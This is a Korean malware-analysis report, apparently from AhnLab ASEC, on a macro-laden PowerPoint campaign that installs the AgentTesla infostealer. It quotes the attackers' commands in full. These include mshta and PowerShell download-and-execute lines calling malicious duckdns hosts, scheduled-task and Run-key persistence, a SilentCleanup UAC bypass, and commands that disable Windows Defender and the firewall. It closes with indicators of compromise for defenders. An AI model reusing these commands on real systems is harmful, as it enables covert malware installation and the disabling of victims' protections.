더욱 정교해진 악성 PPT 를 통해 AgentTesla 유포 중

ASEC 분석팀은 작년부터 꾸준하게 유포되고 있는 악성 PPT 파일에 대해 소개해왔다. 최근에는 악성 PPT 파일에서 실행되는 스크립트에 다양한 악성 기능이 추가 된 것을 확인하였다. 악성 PPT 파일이 실행되는 방식은 기존에 소개해왔던 방식과 동일하며, 악성 스크립트에 의해 추가 악성코드 실행, Anti-AV, UAC bypass 등의 기능을 수행한다.

PPT 파일 실행시, 아래와 같이 기존과 동일하게 매크로 포함 여부를 선택하는 알림창이 생성된다. 이때 매크로 포함 버튼을 선택하게 되면 악성 매크로가 자동으로 실행되게 된다.

매크로 포함 여부 알림

악성 매크로가 실행되면 파워 포인트 에러를 위장한 오류창을 생성하여 사용자가 악성 행위를 알아차리기 힘들도록 하였다.

오류창 위장

악성 매크로는 Auto_Open() 함수에 의해 자동으로 실행되는 형태로, 악성 행위에 사용되는 데이터는 난독화되어 있다. 난독화 해제시 아래와 같은 문자열을 확인할 수 있으며, shell 함수를 통해 악성 명령어가 실행된다.

난독화 해제 후 문자열

악성 매크로에 의해 실행되는 악성 명령어는 아래와 같으며, 기존과 동일하게 mshta 프로세스를 통해 악성 url 에 접근하여 추가 스크립트를 실행하게 된다.

  • 악성 명령어

“c:\windows\system32\calc\..\mshta” “hxxps://hahahahh@j.mp/rendomchrsadowkaduaowidk”

  • Final URL

hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc

해당 사이트에는 악성 vbscript 가 존재하며, 총 3개의 행위를 수행한다. 먼저, 런키에 파워쉘 명령어를 저장 후 해당 명령어를 실행한다. 레지스트리 경로와 파워쉘 명령어는 아래와 같다. 파워쉘 명령어는 두 개의 url 에 접속하여 추가 스크립트를 실행하게 된다. 추가 스크립트는 vbscript 이후 설명되어 있다.

  • 레지스트리 경로

HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:cwdfwiiuyqw

  • 파워쉘 명령어

pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/p1/2.txt’) -useB);i’E’x(iwr(‘hxxp://www.minpowpoin.duckdns.org/fin/c2.txt’) -useB);

vbscript (1)

이후 Shellexecute 를 통해 작업 스케줄러 등록 명령어를 실행하며, 명령어는 아래와 같다. 작업 스케줄러에 등록되는 명령어는 mshta 를 통해 악성 url 에 접속하는 기능으로 63분마다 해당 명령어가 반복된다. 현재 해당 url 은 접속이 불가능하다.

  • 작업 스케줄러 등록

schtasks /create /sc MINUTE /mo 63 /tn kwdwdwfdfabvco /F /tr MsHtA hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt open

vbscript (2)

마지막으로, 런키에 악성 mshta 명령어를 저장한다. 레지스트리 경로와 명령어는 아래와 같다. 해당 명령어는 런키에 등록되어 재부팅시 자동으로 실행되도록 하며 현재 해당 url 은 접속이 불가능하다.

  • 레지스트 경로

HKEY_CURRENT_USER\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run:pilodkis

  • mshta 명령어

MsHTa hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt

vbscirpt (3)

앞에서 언급한 vbscript 에서 실행되는 파워쉘 명령어는 두 개의 url 에 접속을 시도하며, 각 url 에는 다른 기능을 수행하는 악성 파워쉘 명령어가 존재한다. 파워쉘 명령어는 각각 악성코드 실행 및 anti-av, uac bypass 등의 기능을 수행한다. 먼저 첫번째 url 에서 실행되는 파워쉘 명령어는 악성 닷넷 실행 파일을 로드하는 기능을 수행한다. 로드되는 바이너리는 아래와 같은 형태로 존재하며, gzip 을 통해 압축 해제되어 실행된다.

인코딩된 악성 바이너리

위와 같은 형태로 총 2개의 바이너리가 존재하는데, 하나는 악성 행위를 수행하는 payload 이며 나머지 하나는 payload 를 정상 프로세스에 인젝션하는 기능을 수행한다. 아래 명령어를 통해 악성 바이너리가 로드되며, 디코딩된 첫번째 닷넷 파일의 projFUD.alosh_rat 의 Execute 메소드를 실행하는 것을 확인할 수 있다. 또한  “C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe” 경로와 디코딩된 두번째 닷넷 파일을 인자로 실행한다.

악성 바이너리 로드

실행되는 Execute 메소드는 아래와 같으며, aspnet_compiler.exe 프로세스를 생성 후 두번째 닷넷 파일을 인젝션하여 악성 행위를 수행한다. 이때 인젝션되는 파일은 정보유출형 악성코드인 AgentTesla 로 확인되었다.

두번째 url 에서 실행되는 파워쉘 명령어는 백신 프로그램 검사 및 권한 상승 등 다양한 기능을 수행한다. 아래와 같이 특정 경로에 백신 프로그램이 존재하는 경우, “C:\Users\Public\commander.vbs” 파일을 생성하며 윈도우 시작 폴더에 복사 후 실행한다. commander.vbs 파일은 파워쉘 명령어를 통해 “C:\Users\Public\Comola.ps1” 파일을 실행하는 기능을 수행한다.

백신 프로그램 검사

Comola.ps1 파일은 http://www.google.com 에 접속하여 다운로드되는 정상 스크립트로, 백신 제품이 존재하는 경우 악성 행위가 실행되지 않도록 한다.

Comola.ps1 파일 생성

검사 대상 백신 프로그램의 경로는 아래와 같다.

C:\Program Files\ESET\ESET Security\ecmds.exe

– C:\Program Files\Avast Software\Avast\AvastUI.exe

C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

C:\Program Files\AVG\Antivirus\AVGUI.exe

백신 프로그램이 존재하지 않는 경우, 아래와 같은 악성 행위가 수행된다. 다수의 스크립트 파일이 생성되며 각 파일에 대한 설명은 아래와 같다.

1. C:\Users\Public\cooki.ps1

해당 파일은 특정 레지스트리 값을 변경하는 파워쉘 명령어가 포함되어 있으며, 레지스트리 값을 변경하여 윈도우 보안 알림 메시지 창을 비활성화하게 된다.

  • 변경되는 레지스트리
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}.check.0]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks{134EA407-755D-4A93-B8A6-F290CD155023}.check.8001] 외 다수
레지스트리 변경

2. C:\Users\Public\Cola.ps1

해당 파일은 UAC bypass 기능을 수행한다. SID 를 검사하여 관리자일 경우, “C:\Users\Public\common.vbs” 파일을 실행한다. 관리자가 아닐 경우, 윈도우 서비스인 SilentCleanup 작업을 이용하여 권한을 상승한다. SilentCleanup 서비스는 실행시 자동으로 상승된 권한으로 실행되며 %windir%\system32\cleanmgr.exe 파일을 실행한다. 이때 환경 변수 %windir% 를 조작하여 원하는 명령어를 상승된 권한으로 실행시킬 수 있다. 해당 파일에서는 환경변수를 아래와 같이 변경 후 SilentCleanup 서비스를 시작한다.

  • 환경변수 변경

powershell -ep bypass -w h $PSCommandPath;

UAC Bypass

3. C:\Users\Public\Tackel.ps1

해당 파일은 윈도우 디펜더를 비활성화하는 기능을 수행한다. 특정 경로 및 프로세스를 윈도우 디펜더 예외 경로로 설정하며, AgentTesla 가 인젝션되는 aspnet_compiler.exe 프로세스 및 악성 행위에 사용되는 프로세스가 포함되어 있다. 또한 호스트 파일 변경 및 .NET Framework 3.5 기능 파일 설치를 수행한다.

  • 윈도우 디펜더 예외 경로 및 프로세스
    C:\
    D:\
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
    C:\Windows\System32\kernel32.dll
    explorer.exe
    aspnet_compiler.exe
    Mshta.exe
    powershell.exe 외 다수
  • 윈도우 디펜더 비활성화
    New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0
    Set-MpPreference -PUAProtection disable
    Set-MpPreference -HighThreatDefaultAction 6
    Set-MpPreference -ModerateThreatDefaultAction 6
    Set-MpPreference -LowThreatDefaultAction 6
    Set-MpPreference -SevereThreatDefaultAction 6
    Set-MpPreference -ScanScheduleDay 8
    netsh advfirewall set allprofiles state off
  • 호스트 파일 변경
    n66.254.114.41 virusscan.jotti.org
윈도우 디펜더 비활성화, 호스트 파일 변경, 닷넷 프레임워크 설치

4. C:\Users\Public\common.vbs

해당 파일은 Tackel.ps1, cooki.ps1 파일을 실행한다.

5. C:\Users\Public\Chrome.vbs

해당 파일은 Cola.ps1 파일을 실행한다.

최종적으로 Chrome.vbs 파일이 실행된다. 이후 추가 파일들이 순차적으로 실행되어 백신 프로그램 검사 및 UAC Bypass, 윈도우 디펜더 비활성화 등 추가 악성 코드의 실행을 위한 환경을 설정하게 된다.

악성 PPT 파일은 작년부터 꾸준하게 변형되고 있으며 다양한 악성 기능이 추가되어 유포되고 있다. 사용자들은 출처가 불분명한 파일의 열람은 자제해야하며, 문서에 포함된 의심 매크로는 실행하지 않도록 해야 한다.

[파일 진단]

  • Downloader/PPT.Generic
  • Trojan/VBS.Runner
  • Trojan/PowerShell.Bypass
  • Trojan/PowerShell.Disabler

[행위 진단]

  • Execution/MDP.Mshta.M3546

[IOC 정보]

  • eceb63e68b9c3ea9d55e1a6cb1e25d5d
  • 35b2343da6d21a5cede2751026be78f8
  • a6fd5561622b8c942aa40a97a4baece8
  • 61cc1dac681dfcbcd8781a498684d434
  • 79106a7027e6bf3aff964ccf694d99fb
  • 199afc572f448386b8a72f872b64778c
  • 8e7581085b48c219c5fafdf0868a644b
  • hxxps://download2389.mediafire.com/f68ak6xluypg/t1qm2d4ahq43wn3/2.doc
  • hxxp://www.minpowpoin.duckdns.org/p1/2.txt 
  • hxxp://www.minpowpoin.duckdns.org/fin/c2.txt
  • hxxp://kukadunikkk@bakuzamokxxxala.duckdns.org/b1/2.txt
  • hxxp://www.starinxxxgkular.duckdns.org/s1/2.txt

 [기존 악성 PPT 관련 블로그]

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments